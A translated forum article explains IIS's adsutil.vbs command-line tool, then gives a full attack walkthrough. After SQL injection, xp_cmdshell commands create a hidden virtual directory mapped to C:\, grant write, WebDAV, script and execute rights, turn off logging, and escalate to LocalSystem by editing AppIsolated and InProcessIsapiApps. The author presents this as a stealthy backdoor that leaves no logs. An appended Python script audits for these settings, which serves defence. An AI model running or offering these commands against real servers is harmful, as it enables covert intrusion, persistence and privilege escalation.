First, a brief introduction
What is adsutil.vbs? I suspect that many network administrators who have used IIS do not know. It is a script that ships with IIS and manages IIS from the command line. It lives in the %SystemDrive%\Inetpub\AdminScripts directory and is 95,426 bytes in size; a script that large can be expected to do a great deal, and that is indeed the case. Basically, I consider it the command-line counterpart of "Internet Information Services Manager". (In fact, Windows 2000 Server has more than 20 VBS files under %SystemDrive%\Inetpub\AdminScripts for administration. On Windows 2003 only ADSUTIL.VBS remains, which is enough to show how extensive its function is.)
Speaking of adsutil.vbs, metabase.bin has to be mentioned. This file is the most important configuration file of IIS: every IIS setting is ultimately stored in it, and both IIS Manager and adsutil.vbs display their configuration information to the user by reading this file. The storage structure of metabase.bin is very similar to the registry, a tree structure. IIS Manager and adsutil.vbs access metabase.bin through an ADsPath. The path begins with IIS://, where localhost represents the local server and W3SVC represents the IIS Web service. For example, IIS://localhost/W3SVC/1 represents the first Web site on the local server, and IIS://localhost/W3SVC/1/Root/vdir represents the vdir virtual directory under the root of the first Web site.
With this background knowledge, let's go back to adsutil.vbs and look at its usage:
C:\Inetpub\AdminScripts>cscript adsutil.vbs // Don't forget to type cscript.exe, the script host, before the file name
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
Usage:
adsutil.vbs
Description:
IIS Administration Utility that enables the configuration of metabase properties.
Supported commands: // The supported commands. This is the most important part
GET, SET, ENUM, DELETE, CREATE, COPY,
AppCreateInProc, AppCreatePoolProc, AppDelete, AppUnload, AppGetStatus
Samples: // Simple examples
adsutil.vbs GET W3SVC/1/ServerBindings // View the port bindings of the first virtual Web site. W3SVC/1 here is IIS://localhost/W3SVC/1, and ServerBindings is its property. Same below.
adsutil.vbs SET W3SVC/1/ServerBindings ":81:" // Set the bound port of the first virtual Web site to 81.
adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" // Create a MyVdir virtual directory under the root of the first virtual Web site. The "IIsWebVirtualDir" that follows is the type of the directory.
adsutil.vbs START_SERVER W3SVC/1 // Start the first virtual Web site.
adsutil.vbs ENUM /P W3SVC // List all sites in IIS.
For extended help type:
adsutil.vbs HELP // Type this command for further help. I won't reproduce it here, lest someone say I am padding the article for a fee; everyone can look at it themselves. Everything after "//" (here and below) is a comment I added. I trust it is understandable.
The adsutil.vbs commands we use most often are these few: get, set, enum, delete, create. Now I will explain them one by one:
The get command is usually used to view the value of one attribute of a directory. set is used to set a directory attribute. enum is also used to view attributes; the difference is that it directly lists every attribute that has been set, usually several pages of output... It has an optional "/P" switch; with it, enum lists only the virtual directories under that directory. The delete command deletes a virtual directory, and create creates one. There are also a few more commands: start_server, stop_server, pause_server, continue_server. They start, stop, pause and resume the operation of a virtual site.
The main attribute values of a virtual directory are roughly as follows (I only list the ones likely to be useful to us, otherwise it would be far too long):
KeyType: (String) "IIsWebVirtualDir" // Directory type. (String) means it is a string-type attribute
AppRoot: (String) "/LM/W3SVC/1/ROOT" // IIS path of the directory
AppFriendlyName: (String) "Default Application" // Application name
AppIsolated: (Integer) 2 // Specifies whether it runs in a separate process or in-process; an integer-type attribute
HttpCustomHeaders: (List) (1 items) // Custom IIS response headers
"Powered by: www.wofeiwo.info"
HttpErrors: (List) (42 items) // The pages returned for the various IIS status codes. You can set them yourself. Omitted here.
DefaultDoc: (String) "Default.htm,Index.htm,Default.asp,Index.asp,default.php,index.php,default.aspx,index.aspx" // Default document names of the directory
Path: (String) "D:\ftp" // The physical path the directory actually maps to
AccessFlags: (Integer) 513 // I don't know what this is. Anyway I never set it; it seems to be set automatically
AccessExecute: (Boolean) False // Execute permission on the directory; Boolean type
AccessSource: (Boolean) False // Whether WebDAV access to the directory is allowed
AccessRead: (Boolean) True // Read permission on the directory
AccessWrite: (Boolean) False // Write permission on the directory
AccessScript: (Boolean) True // Whether the directory allows scripts to run
AccessNoRemoteExecute: (Boolean) False
AccessNoRemoteRead: (Boolean) False
AccessNoRemoteWrite: (Boolean) False
AccessNoRemoteScript: (Boolean) False
AccessNoPhysicalDir: (Boolean) False
ScriptMaps: (List) (27 items) // Application extension mappings
".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
.................. // N more entries omitted here
AspEnableParentPaths: (Boolean) True
AppPoolId: (String) "DefaultAppPool" // Application pool name
DontLog: (Boolean) True // Prevents IIS from writing log records for this directory
DirBrowseFlags: (Integer) -1073741762
EnableDirBrowsing: (Boolean) True // Whether the directory allows directory listing
DirBrowseShowDate: (Boolean) True // This and the lines below are the settings for how the directory listing is displayed. The English is very simple; I have nothing more to say.
DirBrowseShowTime: (Boolean) True
DirBrowseShowSize: (Boolean) True
DirBrowseShowExtension: (Boolean) True
DirBrowseShowLongDate: (Boolean) True
EnableDefaultDoc: (Boolean) True // Whether the default document is enabled
The above is what I see on my own machine with the cscript adsutil.vbs enum W3SVC/1/Root command. Everyone can enter that command and study the output too.
We can set all of these through the set command, as follows:
cscript adsutil.vbs set W3SVC/1/Root/<directory name>/<property name> <value>
For example: cscript adsutil.vbs set W3SVC/1/Root/wofeiwo/AccessRead 1 // Sets the read permission of the wofeiwo virtual directory under the first virtual Web site to True
Or: cscript adsutil.vbs set W3SVC/1/Root/wofeiwo/Path "C:\" // Sets the physical path the directory maps to as "C:\"
Now let's look at some simple uses.
Second, using adsutil.vbs
(1) A new idea for uploading in MSSQL injection
You may encounter this situation when injecting MSSQL: you have SA privileges and can execute commands (xp_cmdshell, sp_oacreate, jobs, etc.), but the server sits on an internal network behind a bastion host that only maps port 80 through. 3389 is unusable (the internal network cannot be reached), and none of the reverse-download tricks (TFTP, FTP, wget, exe2bat, etc.) get through. What do you do then?
Amanl's classic "Squeezing the last drop out of MSSQL" gave us a good idea: use the VBS scripts under %SystemDrive%\Inetpub\AdminScripts to create a new virtual directory and choose the absolute path it maps to yourself. This bypasses having to guess the absolute path of the Web root. Then a shell can be obtained with backup or makewebtask, by backing up the database or a temporary table into the virtual directory (or simply with echo).
The idea is indeed good. But anyone who has used GetWebshell or Xiaozhu's tools knows how low the success rate of backup or makewebtask is... and echo... I don't even want to talk about it; as I write this I am asking for a scolding (and special characters keep getting filtered...).
In fact, we can improve on Amanl's idea. When we create the new virtual directory, we can give it write permission as well, plus WebDAV... then we can upload arbitrary files directly through IIS, not just text files. Upload a reverse-connect backdoor, run it through SA... and we have everything!
Come on, let's implement it right away:
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs create W3SVC/1/Root/wofeiwo "IIsWebVirtualDir"';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/Path "C:\"';
Note that the special characters above must be escaped. Alternatively, run the above commands with NBSI2 or SQLCOMM.
This way we have created a wofeiwo virtual directory in the first Web site, mapped to the root of C:. Next I give it read and write permission, and, in order to have a Webshell, I also add permission to run scripts:
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/AccessRead 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/AccessWrite 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/AccessScript 1';
When SuperHei wrote "Exploiting IIS write permissions", he presumably had to construct an HTTP request by hand to upload files. In fact there is a simpler way:
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/EnableDirBrowsing 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/AccessSource 1';
Set directory listing and WebDAV access to allowed, then open IE, press Ctrl+O to bring up the "Open" dialog, type the address of the virtual directory you just created, tick "Open as Web Folder" and confirm. See the figure:
Figure 1
Aha! Do you see all the folders? As the picture shows:
Figure 2
Now you can work with the files above like a normal folder, including copying files with Ctrl+C and Ctrl+V. Uploading and modifying files is easy.
(2) Going further
In fact, the idea above can also be used to build an IIS backdoor. Come and see my implementation! (The method here is the one introduced in "An almost perfect IIS backdoor", but I complete the settings with adsutil.vbs, the tool Microsoft ships with IIS. You can look that article up yourselves.)
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs create W3SVC/1/Root/wofeiwo "IIsWebVirtualDir"';-- // Create a wofeiwo directory.
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs create W3SVC/1/Root/wofeiwo/door "IIsWebVirtualDir"';-- // Create a door directory inside the wofeiwo directory.
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/Path "C:\"';-- // Map the directory to the root of C:.
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/AccessRead 1';-- // From here on, set the permissions on the directory. You can refer to the command comments above.
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/AccessWrite 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/AccessScript 1';--
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/DontLog 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/EnableDirBrowsing 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/AccessSource 1';
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/AccessExecute 1';
Some people may say: what is this? Isn't it the same as above? Ha ha. If you look carefully, you will find that the first directory we created, "wofeiwo", has no "Path" attribute set. That is, it is not mapped to any real directory. This makes use of a quirk of IIS (present in IIS5.0.1.0): a virtual directory without a "Path" attribute does not appear in IIS Manager, so it is effectively a hidden directory. The virtual directory "door" beneath it is also invisible, because its parent cannot be reached in IIS Manager! But the "door" directory does have a "Path" attribute. So if we request
http://ip/wofeiwo/door/, the result is a listing of the files under C:. This directory now lets us write and read files, and we can also reach the system32 directory. Our backdoor is built. (Note that here I also added the AccessExecute execute permission.)
But what we execute still runs as IIS's default guest user, IUSR. Without higher privileges we are never satisfied. Below we raise our privileges; I won't cover adding the IUSR user to Administrators. Let's talk about two ways:
1. Set AppIsolated so that programs in this directory run inside the IIS process, which inherits IIS's SYSTEM privileges.
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/Root/wofeiwo/door/AppIsolated 0';
2. Add asp.dll, which handles ASP files, to IIS's list of privileged DLLs. This makes it run in-process and thereby obtain IIS's LocalSystem privileges.
1) First get all of IIS's privileged DLLs
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs get W3SVC/InProcessIsapiApps'
Returns:
InProcessIsapiApps: (List) (5 items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
2) Add asp.dll to the InProcessIsapiApps list. Note that you must also include all the DLLs found above, otherwise they will be removed.
Exec master..xp_cmdshell 'cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';--
Returns:
InProcessIsapiApps: (List) (6 items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
"C:\WINDOWS\system32\inetsrv\asp.dll"
Once this is set, any ASP file runs with LocalSystem privileges. With the steps above, our IIS backdoor is basically in place. You can upload an ASP trojan to help with control. A backdoor set up this way is hard for an administrator to discover, communicates entirely over IIS's port 80, and leaves no log records, so it is quite safe.
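As an added defensive check, not part of the original article, the following Python script parses the text output of cscript adsutil.vbs enum (the "Name : (TYPE) value" format listed earlier on this page) and flags the settings this article combines: a virtual directory without a Path (hidden from IIS Manager), AccessWrite together with AccessSource, DontLog, AppIsolated 0, and asp.dll added to InProcessIsapiApps. The sample listings are constructed from the page's own attribute names; the function names are mine.

```python
import re

# Constructed samples modelled on the adsutil.vbs enum output shown in this article (not captured
# from a real host): the hidden parent directory, which has no Path, and the "door" directory.
SAMPLE_HIDDEN = 'KeyType                : (STRING) "IIsWebVirtualDir"\n'
SAMPLE_DOOR = """\
KeyType                : (STRING) "IIsWebVirtualDir"
Path                   : (STRING) "C:\\"
AccessWrite            : (BOOLEAN) True
AccessSource           : (BOOLEAN) True
AccessExecute          : (BOOLEAN) True
DontLog                : (BOOLEAN) True
AppIsolated            : (INTEGER) 0
"""
SAMPLE_INPROC = """\
InProcessIsapiApps     : (LIST) (2 Items)
  "C:\\WINDOWS\\system32\\inetsrv\\httpext.dll"
  "C:\\WINDOWS\\system32\\inetsrv\\asp.dll"
"""

def parse_enum(text):  # 'Name : (TYPE) value' lines -> dict keyed by lower-cased attribute name
    props = {}
    for line in text.splitlines():
        m = re.match(r'\s*(\w+)\s*:\s*\((\w+)\)\s*(.*)$', line)
        if not m:
            continue  # list items and blank lines carry no 'Name : (TYPE)' prefix
        name, kind, value = m.group(1).lower(), m.group(2).upper(), m.group(3).strip()
        if kind == 'BOOLEAN':
            props[name] = value.lower() == 'true'
        elif kind == 'INTEGER':
            props[name] = int(value)
        else:
            props[name] = value.strip('"')  # STRING values are quoted; LIST headers stay as-is
    return props

def audit_vdir(props):  # findings a defender would want raised for one virtual directory
    findings = []
    if 'path' not in props:
        findings.append('no Path: directory is invisible in IIS Manager')
    if props.get('accesswrite') and props.get('accesssource'):
        findings.append('AccessWrite+AccessSource: WebDAV clients can write files')
    if props.get('accesswrite') and (props.get('accessexecute') or props.get('accessscript')):
        findings.append('writable and executable: uploaded scripts would run')
    if props.get('dontlog'):
        findings.append('DontLog: requests to this directory are not logged')
    if props.get('appisolated') == 0:
        findings.append('AppIsolated=0: code runs in-process as LocalSystem')
    return findings

def inproc_asp_dlls(text):  # asp.dll entries in an InProcessIsapiApps listing
    return [d for d in re.findall(r'"([^"]+)"', text) if d.lower().endswith('\\asp.dll')]
```

Run the audit over the enum output of every virtual directory (including those under a parent that IIS Manager does not show) and over the W3SVC/InProcessIsapiApps listing.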
Third, afterword
That's all I have to say about ADSUTIL.VBS. I suddenly realize I have written so much. Wow... writing articles is very tiring. Since I am a novice, omissions in the article are inevitable; please point them out. If you have any questions, please contact me. My email: wofeiw@bugkidz.org. Or everyone can come find me at the Firefox Technology Alliance,
http://www.wrsky.com. My ID there: "I am not me" (wofeiwo). I am a new moderator of the forum.